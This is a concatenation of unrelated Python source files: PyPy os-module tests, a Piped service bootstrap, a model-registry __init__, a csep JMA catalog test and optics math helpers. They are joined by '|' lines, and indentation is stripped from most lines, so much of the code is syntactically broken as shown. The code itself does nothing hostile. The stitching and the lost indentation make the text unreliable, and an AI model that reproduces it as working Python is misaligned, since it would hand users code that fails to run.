if os.name == 'nt':
py.test.skip("no sparse files on Windows")
def test_largefile():
if not hasattr(os, 'ftruncate'):
py.test.skip("this os has no ftruncate :-(")
need_sparse_files()
filename = str(udir.join('test_largefile'))
r4800000000 = r_longlong(4800000000L)
r4900000000 = r_longlong(4900000000L)
r5000000000 = r_longlong(5000000000L)
r5200000000 = r_longlong(5200000000L)
r9900000000 = r_longlong(9900000000L)
r10000000000 = r_longlong(10000000000L)
def does_stuff():
fd = os.open(filename, os.O_RDWR | os.O_CREAT, 0666)
os.ftruncate(fd, r10000000000)
res = os.lseek(fd, r9900000000, 0)
assert res == r9900000000
res = os.lseek(fd, -r5000000000, 1)
assert res == r4900000000
res = os.lseek(fd, -r5200000000, 2)
assert res == r4800000000
os.close(fd)
try:
os.lseek(fd, 0, 0)
except OSError:
pass
else:
print "DID NOT RAISE"
raise AssertionError
st = os.stat(filename)
assert st.st_size == r10000000000
does_stuff()
os.unlink(filename)
f1 = compile(does_stuff, [])
f1()
os.unlink(filename)
def test_os_access():
filename = str(py.path.local(__file__))
def call_access(path, mode):
return os.access(path, mode)
f = compile(call_access, [str, int])
for mode in os.R_OK, os.W_OK, os.X_OK, (os.R_OK | os.W_OK | os.X_OK):
assert f(filename, mode) == os.access(filename, mode)
def test_os_stat():
filename = str(py.path.local(__file__))
has_blksize = hasattr(os.stat_result, 'st_blksize')
has_blocks = hasattr(os.stat_result, 'st_blocks')
def call_stat():
st = os.stat(filename)
res = (st[0], st.st_ino, st.st_ctime)
if has_blksize: res += (st.st_blksize,)
if has_blocks: res += (st.st_blocks,)
return str(res)
f = compile(call_stat, [])
res = eval(f())
assert res[0] == os.stat(filename).st_mode
assert res[1] == os.stat(filename).st_ino
st_ctime = res[2]
if isinstance(st_ctime, float):
assert (st_ctime - os.stat(filename).st_ctime) < 0.1
else:
assert st_ctime == int(os.stat(filename).st_ctime)
if has_blksize:
assert res[3] == os.stat(filename).st_blksize
if has_blocks:
assert res[4] == os.stat(filename).st_blocks
def test_os_stat_raises_winerror():
if sys.platform != 'win32':
py.test.skip("no WindowsError on this platform")
def call_stat():
try:
os.stat("nonexistentdir/nonexistentfile")
except WindowsError, e:
return e.winerror
return 0
f = compile(call_stat, [])
res = f()
expected = call_stat()
assert res == expected
def test_os_fstat():
if os.environ.get('PYPY_CC', '').startswith('tcc'):
py.test.skip("segfault with tcc :-(")
filename = str(py.path.local(__file__))
def call_fstat():
fd = os.open(filename, os.O_RDONLY, 0777)
st = os.fstat(fd)
os.close(fd)
return str((st.st_mode, st[1], st.st_mtime))
f = compile(call_fstat, [])
osstat = os.stat(filename)
st_mode, st_ino, st_mtime = eval(f())
assert st_mode == osstat.st_mode
if sys.platform != 'win32':
assert st_ino == osstat.st_ino
if isinstance(st_mtime, float):
assert (st_mtime - osstat.st_mtime) < 0.1
else:
assert st_mtime == int(osstat.st_mtime)
def test_os_isatty():
def call_isatty(fd):
return os.isatty(fd)
f = compile(call_isatty, [int])
assert f(0) == os.isatty(0)
assert f(1) == os.isatty(1)
assert f(2) == os.isatty(2)
def test_getcwd():
def does_stuff():
return os.getcwd()
f1 = compile(does_stuff, [])
res = f1()
assert res == os.getcwd()
def test_system():
def does_stuff(cmd):
return os.system(cmd)
f1 = compile(does_stuff, [str])
res = f1("echo hello")
assert res == 0
def test_os_path_exists():
tmpfile = str(udir.join('test_os_path_exists.TMP'))
def fn():
return os.path.exists(tmpfile)
f = compile(fn, [])
open(tmpfile, 'w').close()
assert f() == True
os.unlink(tmpfile)
assert f() == False
def test_os_path_isdir():
directory = "./."
def fn():
return os.path.isdir(directory)
f = compile(fn, [])
assert f() == True
directory = "some/random/name"
def fn():
return os.path.isdir(directory)
f = compile(fn, [])
assert f() == False
def test_time_time():
import time
def fn():
return time.time()
f = compile(fn, [])
t0 = time.time()
    res = f()
t1 = time.time()
assert t0 <= res <= t1
def test_formatd():
from rpython.rlib.rfloat import formatd
def fn(x):
return formatd(x, 'f', 2, 0)
f = compile(fn, [float])
assert f(0.0) == "0.00"
assert f(1.5) == "1.50"
assert f(2.0) == "2.00"
def test_float_to_str():
def fn(f):
return str(f)
f = compile(fn, [float])
res = f(1.5)
assert eval(res) == 1.5
def test_os_unlink():
tmpfile = str(udir.join('test_os_path_exists.TMP'))
def fn():
os.unlink(tmpfile)
f = compile(fn, [])
open(tmpfile, 'w').close()
    f()
assert not os.path.exists(tmpfile)
def test_chdir():
def does_stuff(path):
os.chdir(path)
return os.getcwd()
f1 = compile(does_stuff, [str])
if os.name == 'nt':
assert f1(os.environ['TEMP']) == os.path.realpath(os.environ['TEMP'])
else:
assert f1('/tmp') == os.path.realpath('/tmp')
def test_mkdir_rmdir():
def does_stuff(path, delete):
if delete:
os.rmdir(path)
else:
os.mkdir(path, 0777)
f1 = compile(does_stuff, [str, bool])
dirname = str(udir.join('test_mkdir_rmdir'))
f1(dirname, False)
assert os.path.exists(dirname) and os.path.isdir(dirname)
f1(dirname, True)
assert not os.path.exists(dirname)
def test_strerror():
def does_stuff(n):
return os.strerror(n)
f1 = compile(does_stuff, [int])
for i in range(4):
res = f1(i)
assert res == os.strerror(i)
def test_pipe_dup_dup2():
def does_stuff():
a, b = os.pipe()
c = os.dup(a)
d = os.dup(b)
assert a != b
assert a != c
assert a != d
assert b != c
assert b != d
assert c != d
os.close(c)
os.dup2(d, c)
e, f = os.pipe()
assert e != a
assert e != b
assert e != c
assert e != d
assert f != a
assert f != b
assert f != c
assert f != d
assert f != e
os.close(a)
os.close(b)
os.close(c)
os.close(d)
os.close(e)
os.close(f)
return 42
f1 = compile(does_stuff, [])
res = f1()
assert res == 42
def test_os_chmod():
tmpfile = str(udir.join('test_os_chmod.txt'))
f = open(tmpfile, 'w')
f.close()
# use a witness for the permissions we should expect -
# on Windows it is not possible to change all the bits with chmod()
tmpfile2 = str(udir.join('test_os_chmod_witness.txt'))
f = open(tmpfile2, 'w')
f.close()
def does_stuff(mode):
os.chmod(tmpfile, mode)
f1 = compile(does_stuff, [int])
f1(0000)
os.chmod(tmpfile2, 0000)
assert os.stat(tmpfile).st_mode & 0777 == os.stat(tmpfile2).st_mode & 0777
f1(0644)
os.chmod(tmpfile2, 0644)
assert os.stat(tmpfile).st_mode & 0777 == os.stat(tmpfile2).st_mode & 0777
if hasattr(os, 'fchmod'):
def test_os_fchmod():
tmpfile1 = str(udir.join('test_os_fchmod.txt'))
def does_stuff():
fd = os.open(tmpfile1, os.O_WRONLY | os.O_CREAT, 0777)
os.fchmod(fd, 0200)
os.close(fd)
f1 = compile(does_stuff, [])
f1()
assert os.stat(tmpfile1).st_mode & 0777 == 0200
def test_os_rename():
tmpfile1 = str(udir.join('test_os_rename_1.txt'))
tmpfile2 = str(udir.join('test_os_rename_2.txt'))
f = open(tmpfile1, 'w')
f.close()
def does_stuff():
os.rename(tmpfile1, tmpfile2)
f1 = compile(does_stuff, [])
f1()
assert os.path.exists(tmpfile2)
assert not os.path.exists(tmpfile1)
if hasattr(os, 'mkfifo'):
def test_os_mkfifo():
tmpfile = str(udir.join('test_os_mkfifo.txt'))
def does_stuff():
os.mkfifo(tmpfile, 0666)
f1 = compile(does_stuff, [])
f1()
import stat
st = os.lstat(tmpfile)
assert stat.S_ISFIFO(st.st_mode)
if hasattr(os, 'mknod'):
def test_os_mknod():
import stat
tmpfile = str(udir.join('test_os_mknod.txt'))
def does_stuff():
os.mknod(tmpfile, 0600 | stat.S_IFIFO, 0)
f1 = compile(does_stuff, [])
f1()
st = os.lstat(tmpfile)
assert stat.S_ISFIFO(st.st_mode)
def test_os_umask():
def does_stuff():
mask1 = os.umask(0660)
mask2 = os.umask(mask1)
return mask2
f1 = compile(does_stuff, [])
res = f1()
assert res == does_stuff()
if hasattr(os, 'getpid'):
def test_os_getpid():
def does_stuff():
return os.getpid()
f1 = compile(does_stuff, [])
res = f1()
assert res != os.getpid()
if hasattr(os, 'getpgrp'):
def test_os_getpgrp():
def does_stuff():
return os.getpgrp()
f1 = compile(does_stuff, [])
res = f1()
assert res == os.getpgrp()
if hasattr(os, 'setpgrp'):
def test_os_setpgrp():
def does_stuff():
return os.setpgrp()
f1 = compile(does_stuff, [])
res = f1()
assert res == os.setpgrp()
if hasattr(os, 'link'):
def test_links():
import stat
tmpfile1 = str(udir.join('test_links_1.txt'))
tmpfile2 = str(udir.join('test_links_2.txt'))
tmpfile3 = str(udir.join('test_links_3.txt'))
f = open(tmpfile1, 'w')
f.close()
def does_stuff():
os.symlink(tmpfile1, tmpfile2)
os.link(tmpfile1, tmpfile3)
assert os.readlink(tmpfile2) == tmpfile1
flag= 0
st = os.lstat(tmpfile1)
flag = flag*10 + stat.S_ISREG(st[0])
flag = flag*10 + stat.S_ISLNK(st[0])
st = os.lstat(tmpfile2)
flag = flag*10 + stat.S_ISREG(st[0])
flag = flag*10 + stat.S_ISLNK(st[0])
st = os.lstat(tmpfile3)
flag = flag*10 + stat.S_ISREG(st[0])
flag = flag*10 + stat.S_ISLNK(st[0])
return flag
f1 = compile(does_stuff, [])
res = f1()
assert res == 100110
assert os.path.islink(tmpfile2)
assert not os.path.islink(tmpfile3)
if hasattr(os, 'fork'):
def test_fork():
def does_stuff():
pid = os.fork()
if pid == 0: # child
os._exit(4)
pid1, status1 = os.waitpid(pid, 0)
assert pid1 == pid
return status1
f1 = compile(does_stuff, [])
status1 = f1()
assert os.WIFEXITED(status1)
assert os.WEXITSTATUS(status1) == 4
if hasattr(os, 'kill'):
def test_kill():
import signal
def does_stuff():
pid = os.fork()
if pid == 0: # child
time.sleep(5)
os._exit(4)
os.kill(pid, signal.SIGTERM) # in the parent
pid1, status1 = os.waitpid(pid, 0)
assert pid1 == pid
return status1
f1 = compile(does_stuff, [])
status1 = f1()
assert os.WIFSIGNALED(status1)
assert os.WTERMSIG(status1) == signal.SIGTERM
elif hasattr(os, 'waitpid'):
# windows has no fork but some waitpid to be emulated
def test_waitpid():
prog = str(sys.executable)
def does_stuff():
args = [prog]
# args = [prog, '-c', '"import os;os._exit(4)"']
# note that the above variant creates a bad array
args.append('-c')
args.append('"import os;os._exit(4)"')
pid = os.spawnv(os.P_NOWAIT, prog, args)
#if pid == 0: # child
# os._exit(4)
pid1, status1 = os.waitpid(pid, 0)
assert pid1 == pid
return status1
f1 = compile(does_stuff, [])
status1 = f1()
# for what reason do they want us to shift by 8? See the doc
assert status1 >> 8 == 4
if hasattr(os, 'kill'):
def test_kill_to_send_sigusr1():
import signal
from rpython.rlib import rsignal
if not 'SIGUSR1' in dir(signal):
py.test.skip("no SIGUSR1 available")
def does_stuff():
rsignal.pypysig_setflag(signal.SIGUSR1)
os.kill(os.getpid(), signal.SIGUSR1)
rsignal.pypysig_ignore(signal.SIGUSR1)
while True:
n = rsignal.pypysig_poll()
if n < 0 or n == signal.SIGUSR1:
break
return n
f1 = compile(does_stuff, [])
got_signal = f1()
assert got_signal == signal.SIGUSR1
if hasattr(os, 'killpg'):
def test_killpg():
import signal
from rpython.rlib import rsignal
def does_stuff():
os.setpgid(0, 0) # become its own separated process group
rsignal.pypysig_setflag(signal.SIGUSR1)
os.killpg(os.getpgrp(), signal.SIGUSR1)
rsignal.pypysig_ignore(signal.SIGUSR1)
while True:
n = rsignal.pypysig_poll()
if n < 0 or n == signal.SIGUSR1:
break
return n
f1 = compile(does_stuff, [])
got_signal = f1()
assert got_signal == signal.SIGUSR1
if hasattr(os, 'chown') and hasattr(os, 'lchown'):
def test_os_chown_lchown():
path1 = udir.join('test_os_chown_lchown-1.txt')
path2 = udir.join('test_os_chown_lchown-2.txt')
path1.write('foobar')
path2.mksymlinkto('some-broken-symlink')
tmpfile1 = str(path1)
tmpfile2 = str(path2)
def does_stuff():
# xxx not really a test, just checks that they are callable
os.chown(tmpfile1, os.getuid(), os.getgid())
os.lchown(tmpfile1, os.getuid(), os.getgid())
os.lchown(tmpfile2, os.getuid(), os.getgid())
try:
os.chown(tmpfile2, os.getuid(), os.getgid())
except OSError:
pass
else:
raise AssertionError("os.chown(broken symlink) should raise")
f1 = compile(does_stuff, [])
f1()
if hasattr(os, 'fchown'):
def test_os_fchown():
path1 = udir.join('test_os_fchown.txt')
tmpfile1 = str(path1)
def does_stuff():
# xxx not really a test, just checks that it is callable
fd = os.open(tmpfile1, os.O_WRONLY | os.O_CREAT, 0777)
os.fchown(fd, os.getuid(), os.getgid())
os.close(fd)
f1 = compile(does_stuff, [])
f1()
if hasattr(os, 'getlogin'):
def test_os_getlogin():
def does_stuff():
return os.getlogin()
try:
expected = os.getlogin()
except OSError, e:
py.test.skip("the underlying os.getlogin() failed: %s" % e)
f1 = compile(does_stuff, [])
assert f1() == expected
# ____________________________________________________________
def _real_getenv(var):
cmd = '''%s -c "import os; x=os.environ.get('%s'); print (x is None) and 'F' or ('T'+x)"''' % (
sys.executable, var)
g = os.popen(cmd, 'r')
output = g.read().strip()
g.close()
if output == 'F':
return None
elif output.startswith('T'):
return output[1:]
else:
raise ValueError('probing for env var returned %r' % (output,))
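# For example (a sketch): _real_getenv('PATH') launches a fresh interpreter and
# reports what that child actually sees for the variable, which lets the tests
# below verify that changes made through os.environ really reach subprocesses.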
def test_dictlike_environ_getitem():
def fn(s):
try:
return os.environ[s]
except KeyError:
return '--missing--'
func = compile(fn, [str])
os.environ.setdefault('USER', 'UNNAMED_USER')
result = func('USER')
assert result == os.environ['USER']
result = func('PYPY_TEST_DICTLIKE_MISSING')
assert result == '--missing--'
def test_dictlike_environ_get():
def fn(s):
res = os.environ.get(s)
if res is None: res = '--missing--'
return res
func = compile(fn, [str])
os.environ.setdefault('USER', 'UNNAMED_USER')
result = func('USER')
assert result == os.environ['USER']
result = func('PYPY_TEST_DICTLIKE_MISSING')
assert result == '--missing--'
def test_dictlike_environ_setitem():
def fn(s, t1, t2, t3, t4, t5):
os.environ[s] = t1
os.environ[s] = t2
os.environ[s] = t3
os.environ[s] = t4
os.environ[s] = t5
return os.environ[s]
func = compile(fn, [str] * 6)
r = func('PYPY_TEST_DICTLIKE_ENVIRON', 'a', 'b', 'c', 'FOOBAR', '42')
assert r == '42'
def test_dictlike_environ_delitem():
def fn(s1, s2, s3, s4, s5):
for n in range(10):
os.environ[s1] = 't1'
os.environ[s2] = 't2'
os.environ[s3] = 't3'
os.environ[s4] = 't4'
os.environ[s5] = 't5'
del os.environ[s3]
del os.environ[s1]
del os.environ[s2]
del os.environ[s4]
try:
del os.environ[s2]
except KeyError:
pass
else:
raise Exception("should have raised!")
# os.environ[s5] stays
func = compile(fn, [str] * 5)
func('PYPY_TEST_DICTLIKE_ENVDEL1',
'PYPY_TEST_DICTLIKE_ENVDEL_X',
'PYPY_TEST_DICTLIKE_ENVDELFOO',
'PYPY_TEST_DICTLIKE_ENVDELBAR',
'PYPY_TEST_DICTLIKE_ENVDEL5')
def test_dictlike_environ_keys():
def fn():
return '\x00'.join(os.environ.keys())
func = compile(fn, [])
os.environ.setdefault('USER', 'UNNAMED_USER')
try:
del os.environ['PYPY_TEST_DICTLIKE_ENVKEYS']
except:
pass
result1 = func().split('\x00')
os.environ['PYPY_TEST_DICTLIKE_ENVKEYS'] = '42'
result2 = func().split('\x00')
assert 'USER' in result1
assert 'PYPY_TEST_DICTLIKE_ENVKEYS' not in result1
assert 'USER' in result2
assert 'PYPY_TEST_DICTLIKE_ENVKEYS' in result2
def test_dictlike_environ_items():
def fn():
result = []
for key, value in os.environ.items():
result.append('%s/%s' % (key, value))
return '\x00'.join(result)
func = compile(fn, [])
os.environ.setdefault('USER', 'UNNAMED_USER')
result1 = func().split('\x00')
os.environ['PYPY_TEST_DICTLIKE_ENVITEMS'] = '783'
result2 = func().split('\x00')
assert ('USER/%s' % (os.environ['USER'],)) in result1
assert 'PYPY_TEST_DICTLIKE_ENVITEMS/783' not in result1
assert ('USER/%s' % (os.environ['USER'],)) in result2
assert 'PYPY_TEST_DICTLIKE_ENVITEMS/783' in result2
def test_listdir():
def mylistdir(s):
try:
os.listdir('this/directory/really/cannot/exist')
except OSError:
pass
else:
raise AssertionError("should have failed!")
result = os.listdir(s)
return '/'.join(result)
func = compile(mylistdir, [str])
for testdir in [str(udir), os.curdir]:
result = func(testdir)
result = result.split('/')
result.sort()
compared_with = os.listdir(testdir)
compared_with.sort()
assert result == compared_with
if hasattr(posix, 'execv') and hasattr(posix, 'fork'):
def test_execv():
progname = str(sys.executable)
filename = str(udir.join('test_execv.txt'))
def does_stuff():
l = [progname, '-c', 'open(%r,"w").write("1")' % filename]
pid = os.fork()
if pid == 0:
os.execv(progname, l)
else:
os.waitpid(pid, 0)
func = compile(does_stuff, [], backendopt=False)
func()
assert open(filename).read() == "1"
def test_execv_raising():
def does_stuff():
try:
l = []
l.append("asddsadw32eewdfwqdqwdqwd")
os.execv(l[0], l)
return 1
except OSError:
return -2
func = compile(does_stuff, [])
assert func() == -2
def test_execve():
filename = str(udir.join('test_execve.txt'))
progname = sys.executable
def does_stuff():
l = []
l.append(progname)
l.append("-c")
l.append('import os; open(%r, "w").write(os.environ["STH"])' % filename)
env = {}
env["STH"] = "42"
env["sthelse"] = "a"
pid = os.fork()
if pid == 0:
os.execve(progname, l, env)
else:
os.waitpid(pid, 0)
func = compile(does_stuff, [])
func()
assert open(filename).read() == "42"
if hasattr(posix, 'spawnv'):
def test_spawnv():
filename = str(udir.join('test_spawnv.txt'))
progname = str(sys.executable)
scriptpath = udir.join('test_spawnv.py')
scriptpath.write('f=open(%r,"w")\nf.write("2")\nf.close\n' % filename)
scriptname = str(scriptpath)
def does_stuff():
# argument quoting on Windows is completely ill-defined.
# don't let yourself be fooled by the idea that if os.spawnv()
# takes a list of strings, then the receiving program will
# nicely see these strings as arguments with no further quote
# processing. Achieving this is nearly impossible - even
# CPython doesn't try at all.
l = [progname, scriptname]
pid = os.spawnv(os.P_NOWAIT, progname, l)
os.waitpid(pid, 0)
func = compile(does_stuff, [])
func()
assert open(filename).read() == "2"
if hasattr(posix, 'spawnve'):
def test_spawnve():
filename = str(udir.join('test_spawnve.txt'))
progname = str(sys.executable)
scriptpath = udir.join('test_spawnve.py')
scriptpath.write('import os\n' +
'f=open(%r,"w")\n' % filename +
'f.write(os.environ["FOOBAR"])\n' +
                         'f.close()\n')
scriptname = str(scriptpath)
def does_stuff():
l = [progname, scriptname]
pid = os.spawnve(os.P_NOWAIT, progname, l, {'FOOBAR': '42'})
os.waitpid(pid, 0)
func = compile(does_stuff, [])
func()
assert open(filename).read() == "42"
def test_utime():
path = str(udir.ensure("test_utime.txt"))
from time import time, sleep
t0 = time()
sleep(1)
def does_stuff(flag):
if flag:
os.utime(path, None)
else:
os.utime(path, (int(t0), int(t0)))
func = compile(does_stuff, [int])
func(1)
assert os.stat(path).st_atime > t0
func(0)
assert int(os.stat(path).st_atime) == int(t0)
if hasattr(os, 'uname'):
def test_os_uname():
def does_stuff(num):
tup = os.uname()
lst = [tup[0], tup[1], tup[2], tup[3], tup[4]]
return lst[num]
func = compile(does_stuff, [int])
for i in range(5):
res = func(i)
assert res == os.uname()[i]
if hasattr(os, 'getloadavg'):
def test_os_getloadavg():
def does_stuff():
a, b, c = os.getloadavg()
print a, b, c
return a + b + c
f = compile(does_stuff, [])
res = f()
assert type(res) is float and res >= 0.0
if hasattr(os, 'major'):
def test_os_major_minor():
def does_stuff(n):
a = os.major(n)
b = os.minor(n)
x = os.makedev(a, b)
return '%d,%d,%d' % (a, b, x)
f = compile(does_stuff, [int])
res = f(12345)
assert res == '%d,%d,12345' % (os.major(12345), os.minor(12345))
if hasattr(os, 'fchdir'):
def test_os_fchdir():
def does_stuff():
fd = os.open('/', os.O_RDONLY, 0400)
try:
os.fchdir(fd)
s = os.getcwd()
finally:
os.close(fd)
return s == '/'
f = compile(does_stuff, [])
localdir = os.getcwd()
try:
res = f()
finally:
os.chdir(localdir)
assert res == True
# ____________________________________________________________
class TestExtFuncStandalone(StandaloneTests):
if hasattr(os, 'nice'):
def test_os_nice(self):
def does_stuff(argv):
res = os.nice(3)
print 'os.nice returned', res
return 0
t, cbuilder = self.compile(does_stuff)
data = cbuilder.cmdexec('')
res = os.nice(0) + 3
if res > 19: res = 19 # xxx Linux specific, probably
assert data.startswith('os.nice returned %d\n' % res)
|
# Copyright (c) 2010-2011, Found IT A/S and Piped Project Contributors.
# See LICENSE for details.
import logging
import os
import sys
import json
import yaml
from twisted.internet import reactor
from piped import exceptions, resource, processing, service
logger = logging.getLogger('piped.service')
runtime_environment = processing.RuntimeEnvironment()
runtime_environment.configure()
application = runtime_environment.application
def _on_configuration_loaded():
service_name = runtime_environment.configuration_manager.get('service_name', 'piped')
# Set the process title, if we can.
try:
import setproctitle
setproctitle.setproctitle(service_name)
except ImportError:
# It's just a nicety, though, so don't blow up if we can't.
pass
logger.info('Starting service "%s" (PID %i).'%(service_name, os.getpid()))
provider_plugin_manager = resource.ProviderPluginManager()
provider_plugin_manager.configure(runtime_environment)
service_plugin_manager = service.ServicePluginManager()
service_plugin_manager.configure(runtime_environment)
# Move these into acting upon state changes.
runtime_environment.dependency_manager.resolve_initial_states()
def bootstrap():
configuration_file_path = os.environ.get('PIPED_CONFIGURATION_FILE', None)
overrides = json.loads(os.environ.get('PIPED_CONFIGURATION_OVERRIDES', '[]'))
try:
_fail_if_no_configuration_file_is_specified(configuration_file_path)
runtime_environment.configuration_manager.load_from_file(configuration_file_path)
_handle_configuration_overrides(runtime_environment.configuration_manager, overrides)
_on_configuration_loaded()
except:
logger.critical('Error while bootstrapping service.', exc_info=True)
reactor.stop()
def _handle_configuration_overrides(configuration_manager, overrides):
for override in overrides:
# in yaml, a mapping uses a colon followed by a space, but we want to be able to
# specify -O some.nested.option:42 on the command line, without the space, so we
# add a space after the first colon in the override specification, as doing so does
# not affect an otherwise correct yaml mapping.
adjusted_override = override.replace(':', ': ', 1)
override_as_dict = yaml.load(adjusted_override)
if not isinstance(override_as_dict, dict):
e_msg = 'Invalid override specification.'
detail = 'Expected a yaml mapping, but got %r.' % override
raise exceptions.ConfigurationError(e_msg, detail)
for path, value in override_as_dict.items():
logger.debug('Setting configuration override %r.'%path)
configuration_manager.set(path, value)
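# For example (a sketch): the override string 'some.nested.option:42' is
# adjusted to 'some.nested.option: 42', which yaml parses to
# {'some.nested.option': 42}; that single path/value pair is then set on the
# configuration manager.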
def _fail_if_no_configuration_file_is_specified(configuration_file_path):
if not configuration_file_path:
e_msg = 'No configuration file specified.'
detail = ('Either use the -c/--conf option of %r, or set the PIPED_CONFIGURATION_FILE environment '
'variable to the path of the configuration file.' % sys.argv[0])
raise exceptions.ConfigurationError(e_msg, detail)
# The callLater is necessary so providers don't start before forking if we're daemonizing.
reactor.callLater(0, bootstrap)
|
from .edsr import EDSR
from .edvr_net import EDVRNet
from .edvr_net_wopre import EDVRNet_WoPre
from .edvr_net_wopre2 import EDVRNet_WoPre2
from .edvr_net_test import EDVRNet_Test
from .rrdb_net import RRDBNet
from .sr_resnet import MSRResNet
from .srcnn import SRCNN
from .tof import TOFlow
__all__ = [
'MSRResNet', 'RRDBNet', 'EDSR', 'EDVRNet', 'EDVRNet_WoPre',
'EDVRNet_WoPre2', 'EDVRNet_Test', 'TOFlow', 'SRCNN'
]
|
import unittest
import csep
import os.path
import numpy
def get_datadir():
root_dir = os.path.dirname(os.path.abspath(__file__))
data_dir = os.path.join(root_dir, 'artifacts', 'JMA-observed_catalog')
return data_dir
def test_JmaCsvCatalog_loading():
datadir = get_datadir()
csv_file = os.path.join(datadir, 'test.csv')
test_catalog = csep.load_catalog(csv_file, type='jma-csv')
assert len(test_catalog.catalog) == 22284, 'invalid number of events in observed_catalog object'
_dummy = test_catalog.get_magnitudes()
assert len(_dummy) == len(test_catalog.catalog)
_dummy = test_catalog.get_depths()
assert len(_dummy) == len(test_catalog.catalog)
_dummy = test_catalog.get_longitudes()
assert len(_dummy) == len(test_catalog.catalog)
_dummy = test_catalog.get_latitudes()
assert len(_dummy) == len(test_catalog.catalog)
_dummy = test_catalog.get_epoch_times()
assert len(_dummy) == len(test_catalog.catalog)
_dummy = test_catalog.get_datetimes()
assert len(_dummy) == len(test_catalog.catalog)
# assert (d[0].timestamp() * 1000.) == c.observed_catalog['timestamp'][0]
    # Integer arrays cannot hold NaN, so start from zeros (every entry is
    # overwritten in the loop below anyway).
    _datetimes = numpy.zeros(test_catalog.event_count, dtype='<i8')
for _idx, _val in enumerate(_dummy):
_datetimes[_idx] = round(1000. * _val.timestamp())
numpy.testing.assert_allclose(_datetimes, test_catalog.catalog['origin_time'],
err_msg='timestamp mismatch',
verbose=True, rtol=0, atol=0)
|
# -*- coding: utf-8 -*-
# Compatible with Python 3.8
# Copyright (C) 2020-2021 Oscar Gerardo Lazo Arjona
# mailto: oscar.lazoarjona@physics.ox.ac.uk
r"""Miscellaneous routines."""
import numpy as np
import warnings
from scipy.interpolate import interp1d
from numpy import sinc as normalized_sinc
from scipy.special import hermite, factorial
from sympy import log, pi, symbols, exp, diff, sqrt
from sympy import factorial as factorial_sym
from sympy import sinc as sinc_sym
from sympy import Basic, Piecewise, Abs, sin, Rational
from scipy.constants import k as k_B
from scipy.constants import c
from scipy.special import gamma as gamma_function
def rel_error(a, b):
r"""Get the relative error between two quantities."""
scalar = not hasattr(a, "__getitem__")
if scalar:
a = np.abs(a)
b = np.abs(b)
if a == 0.0 and b == 0.0:
return 0.0
if a > b:
return 1 - b/a
else:
return 1 - a/b
shape = [2] + list(a.shape)
aux = np.zeros(shape)
aux[0, :] = np.abs(a)
aux[1, :] = np.abs(b)
small = np.amin(aux, axis=0)
large = np.amax(aux, axis=0)
# Replace zeros with one, to avoid zero-division errors.
small[small == 0] = 1
large[large == 0] = 1
err = 1-small/large
if scalar:
return err[0]
return err
def glo_error(a, b, scale=None):
r"""Get the "global" relative error between two quantities."""
if scale is None:
scale = np.amax([np.amax(np.abs(a)), np.amax(np.abs(b))])
if scale == 0.0:
return np.zeros(a.shape)
return np.abs(a-b)/scale
def get_range(fp):
r"""Get the range of an array."""
fp = np.abs(fp)
aux = fp.copy()
aux[aux == 0] = np.amax(fp)
vmin = np.amin(aux)
vmax = np.amax(fp)
return np.array([vmin, vmax])
def interpolator(xp, fp, kind="linear"):
r"""Return an interpolating function that extrapolates to zero."""
F = interp1d(xp, fp, kind)
def f(x):
if isinstance(x, np.ndarray):
return np.array([f(xi) for xi in x])
if xp[0] <= x <= xp[-1]:
return F(x)
else:
return 0.0
return f
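# A quick sketch of the behaviour: with f = interpolator([0, 1, 2], [0, 1, 4]),
# f(1.5) interpolates linearly to 2.5, while f(5.0) falls outside [0, 2] and
# therefore returns 0.0.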
def ffftfreq(t):
r"""Calculate the angular frequency axis for a given time axis."""
dt = t[1]-t[0]
nu = np.fft.fftshift(np.fft.fftfreq(t.size, dt))
return nu
def ffftfft(f, t):
r"""Calculate the Fourier transform."""
dt = (t[-1]-t[0])/len(t)
return np.fft.fftshift(np.fft.fft(np.fft.ifftshift(f)))*dt
def iffftfft(f, nu):
r"""Calculate the inverse Fourier transform."""
Deltanu = nu[-1]-nu[0]
return np.fft.fftshift(np.fft.ifft(np.fft.ifftshift(f)))*Deltanu
##############################################################################
# Mode shape routines.
def time_bandwith_product(m=1, symbolic=False):
r"""Return an approximate of the time-bandwidth product for a generalized
pulse.
"""
if symbolic and m == 1:
return 2*log(2)/pi
if m == 1:
return 2*np.log(2)/np.pi
elif str(m) == "oo":
return 0.885892941378901
else:
a, b, B, p = (0.84611760622587673, 0.44076249541699231,
0.87501561821518636, 0.64292796298081856)
return (B-b)*(1-np.exp(-a*(m-1)**p))+b
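# Sanity check (a sketch): for m=1 the analytic value 2*log(2)/pi is roughly
# 0.4413, and the m -> oo branch returns the tabulated limit 0.885892941378901.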
def hermite_gauss(n, x, sigma, power_fwhm=False):
"""Generate normalized Hermite-Gauss mode."""
if isinstance(x, Basic):
if power_fwhm: sigma = sigma/2/sqrt(log(2))
X = x / sigma
u = symbols("u")
h = (-1)**n*exp(u**2)*diff(exp(-u**2), u, n)
result = h.subs(u, X)*exp(-X**2/2)
result /= sqrt(factorial_sym(n) * sqrt(pi) * 2**n * sigma)
else:
if power_fwhm: sigma = sigma/2/np.sqrt(np.log(2))
X = x / sigma
result = hermite(n)(X) * np.exp(-X**2 / 2)
result /= np.sqrt(factorial(n) * np.sqrt(np.pi) * 2**n * sigma)
return result
def harmonic(n, x, L):
r"""Generate a normalized harmonic mode."""
if isinstance(x, Basic):
omega = pi/L
h = sin(n*omega*(x + L/2))/sqrt(L/2)
else:
omega = np.pi/L
h = np.sin(n*omega*(x + L/2))/np.sqrt(L/2)
h = h*np.where(np.abs(x) < L/2, 1.0, 0.0)
return h
def falling_exponential(x, gamma, a=None, simp=False):
u"""A falling exponential function with `1/e` length `gamma`.
⎧ √γ exp(-γ x/2) for x >= 0
f(x) = ⎨
⎩ 0 otherwise
"""
if isinstance(x, Basic):
f = sqrt(gamma)*exp(-gamma*x/2)
if simp:
return f
else:
return Piecewise(*[(f, x >= 0), (0, True)])
return np.where(x >= 0, np.sqrt(gamma)*np.exp(-gamma*x/2), 0.0)
def gaussian_square(n, t, fwhm):
"""We obtain a normalized function of the form
2⋅n
⎛t⎞
-⎜─⎟
⎝τ⎠
────────
2
ℯ
with the given (amplitude square) fwhm.
"""
if str(n) == "oo":
return heaviside_pi(t/fwhm)/np.sqrt(fwhm)
elif n < 1:
raise ValueError
else:
tau = fwhm*np.log(2)**(-1/(2.0*n))/2
X = t/tau
norm = np.sqrt(2*tau*gamma_function(1 + 1/(2.0*n)))
return np.exp(-X**(2*n)/2)/norm
def sinc(x):
u"""The non-normalized sinc.
⎧ 1 for x = 0
sinc(x) = ⎨
⎩ sin(x)/x otherwise
"""
if isinstance(x, Basic):
return sinc_sym(x)
return normalized_sinc(x/np.pi)
